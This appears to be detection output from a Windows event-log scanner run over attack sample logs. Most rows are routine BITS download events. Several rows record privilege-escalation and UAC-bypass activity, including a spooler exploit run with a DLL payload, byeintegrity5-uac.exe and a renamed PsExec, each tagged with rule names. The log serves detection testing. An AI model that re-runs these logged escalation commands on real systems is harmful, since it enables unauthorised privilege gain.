+2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe  :  URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe  payload.dll  :  Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe  :  User: 3B\lgreen  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe  :  Path: C:\Windows\System32\spoolsv.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe  :  Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0)  :  Path: C:\Windows\System32\taskhostw.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe  :  Path: C:\Users\Public\psexecprivesc.exe  :  User: MSEDGEWIN10\user02  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
